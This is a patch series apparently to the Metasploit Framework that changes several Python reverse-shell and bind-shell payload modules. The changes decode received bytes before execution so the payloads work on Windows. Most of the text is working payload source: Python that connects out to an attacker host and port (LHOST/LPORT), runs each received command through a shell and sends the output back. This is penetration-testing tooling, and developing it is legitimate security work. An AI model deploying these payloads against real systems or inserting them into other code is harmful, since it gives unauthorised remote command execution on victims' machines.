From bebf8d4db8fe97a232f40883b5272d15b5a9d545 Mon Sep 17 00:00:00 2001 From: manishkumarr1017 Date: Mon, 29 May 2023 21:38:16 +0530 Subject: [PATCH 1/4] changing payload structure of python's reverse_tcp for fixing windows bytes args is not allowed issue --- .../payloads/singles/python/shell_reverse_tcp.rb | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/modules/payloads/singles/python/shell_reverse_tcp.rb b/modules/payloads/singles/python/shell_reverse_tcp.rb index 1c0ced2d5e..e2e4c23423 100644 --- a/modules/payloads/singles/python/shell_reverse_tcp.rb +++ b/modules/payloads/singles/python/shell_reverse_tcp.rb @@ -45,15 +45,19 @@ module MetasploitModule cmd = <<~PYTHON import socket as s import subprocess as r + import platform so=s.socket(s.AF_INET,s.SOCK_STREAM) so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']})) while True: - d=so.recv(1024) - if len(d)==0: - break - p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) - o=p.stdout.read()+p.stderr.read() - so.send(o) + d=so.recv(1024) + if len(d)==0: + break + if platform.system()=='Windows': + p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) + else: + p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) + o=p.stdout.read()+p.stderr.read() + so.send(o) PYTHON py_create_exec_stub(cmd) From f8460dcdd256c28d9ea51212f9f2016d26312034 Mon Sep 17 00:00:00 2001 From: manishkumarr1017 Date: Fri, 2 Jun 2023 14:43:09 +0530 Subject: [PATCH 2/4] PR Review changes for removing platform specific code --- modules/payloads/singles/python/shell_reverse_tcp.rb | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/modules/payloads/singles/python/shell_reverse_tcp.rb b/modules/payloads/singles/python/shell_reverse_tcp.rb index e2e4c23423..bacf5afd36 100644 --- a/modules/payloads/singles/python/shell_reverse_tcp.rb +++ b/modules/payloads/singles/python/shell_reverse_tcp.rb @@ -45,17 +45,13 @@ module MetasploitModule cmd = <<~PYTHON import socket as s import subprocess as r - import platform so=s.socket(s.AF_INET,s.SOCK_STREAM) so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']})) while True: d=so.recv(1024) if len(d)==0: - break - if platform.system()=='Windows': - p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) - else: - p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) + break + p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) o=p.stdout.read()+p.stderr.read() so.send(o) PYTHON From d454e23aa092c9c3754b9684add07697102bca0e Mon Sep 17 00:00:00 2001 From: manishkumarr1017 Date: Thu, 8 Jun 2023 06:44:37 +0530 Subject: [PATCH 3/4] decoding bytes from all python payloads --- modules/payloads/singles/cmd/unix/reverse_python_ssl.rb | 2 +- modules/payloads/singles/python/shell_bind_tcp.rb | 2 +- modules/payloads/singles/python/shell_reverse_sctp.rb | 2 +- modules/payloads/singles/python/shell_reverse_tcp_ssl.rb | 2 +- modules/payloads/singles/python/shell_reverse_udp.rb | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb index d1fc4bcd3a..0b7d3e7951 100644 --- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb @@ -61,7 +61,7 @@ module MetasploitModule cmd += "while not #{dead}:\n" cmd += "\tdata=s.recv(1024)\n" cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n" - cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n" + cmd += "\tproc=subprocess.Popen(data.decode('utf-8'),shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n" cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n" cmd += "\ts.send(stdout_value)\n" "#{datastore['PythonPath']} -c \"#{ py_create_exec_stub(cmd) }\"" diff --git a/modules/payloads/singles/python/shell_bind_tcp.rb b/modules/payloads/singles/python/shell_bind_tcp.rb index abeb893584..ef779fad3a 100644 --- a/modules/payloads/singles/python/shell_bind_tcp.rb +++ b/modules/payloads/singles/python/shell_bind_tcp.rb @@ -42,7 +42,7 @@ module MetasploitModule d=so.recv(1024) if len(d)==0: break - p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) + p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) o=p.stdout.read()+p.stderr.read() so.send(o) PYTHON diff --git a/modules/payloads/singles/python/shell_reverse_sctp.rb b/modules/payloads/singles/python/shell_reverse_sctp.rb index c8f1b0b6f3..eff88b0110 100644 --- a/modules/payloads/singles/python/shell_reverse_sctp.rb +++ b/modules/payloads/singles/python/shell_reverse_sctp.rb @@ -51,7 +51,7 @@ module MetasploitModule d=so.recv(1024) if len(d)==0: break - p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) + p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) o=p.stdout.read()+p.stderr.read() try: so.send(o) diff --git a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb index 106c3d8a35..07c1879e54 100644 --- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb @@ -53,7 +53,7 @@ module MetasploitModule d=so.recv(1024) if len(d)==0: break - p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) + p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) o=p.stdout.read()+p.stderr.read() so.sendall(o) PYTHON diff --git a/modules/payloads/singles/python/shell_reverse_udp.rb b/modules/payloads/singles/python/shell_reverse_udp.rb index 02e8893456..95af617d7a 100644 --- a/modules/payloads/singles/python/shell_reverse_udp.rb +++ b/modules/payloads/singles/python/shell_reverse_udp.rb @@ -52,7 +52,7 @@ module MetasploitModule d=so.recv(1024) if len(d)==0: break - p=r.Popen(d,shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) + p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) o=p.stdout.read()+p.stderr.read() PYTHON From 6030f75b1aae759a186eb27d376dae6f5b30aaa5 Mon Sep 17 00:00:00 2001 From: manishkumarr1017 Date: Thu, 8 Jun 2023 06:52:33 +0530 Subject: [PATCH 4/4] fixing indentation for shell reverse tcp payload --- modules/payloads/singles/python/shell_reverse_tcp.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/payloads/singles/python/shell_reverse_tcp.rb b/modules/payloads/singles/python/shell_reverse_tcp.rb index bacf5afd36..2468480dcf 100644 --- a/modules/payloads/singles/python/shell_reverse_tcp.rb +++ b/modules/payloads/singles/python/shell_reverse_tcp.rb @@ -48,12 +48,12 @@ module MetasploitModule so=s.socket(s.AF_INET,s.SOCK_STREAM) so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']})) while True: - d=so.recv(1024) - if len(d)==0: - break - p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) - o=p.stdout.read()+p.stderr.read() - so.send(o) + d=so.recv(1024) + if len(d)==0: + break + p=r.Popen(d.decode('utf-8'),shell=True,stdin=r.PIPE,stdout=r.PIPE,stderr=r.PIPE) + o=p.stdout.read()+p.stderr.read() + so.send(o) PYTHON py_create_exec_stub(cmd)